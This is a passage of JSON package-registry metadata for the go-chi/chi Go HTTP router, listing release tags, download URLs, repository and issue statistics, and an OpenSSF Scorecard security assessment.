hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.209Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.966061736475957,"dependent_packages_count":6.527826853133711,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":6.746944294804834},"purl":"pkg:golang/github.com/go-%21chi/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-Chi/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-Chi/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-Chi/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11361286,"name":"github.com/go-Chi/Chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-Chi/Chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:16.910Z","created_at":"2025-02-18T07:34:04.908Z","updated_at":"2026-08-12T02:06:16.911Z","registry_url":"https://pkg.go.dev/github.com/go-Chi/Chi/v5","install_command":"go get github.com/go-Chi/Chi/v5","documentation_url":"https://pkg.go.dev/github.com/go-Chi/Chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha"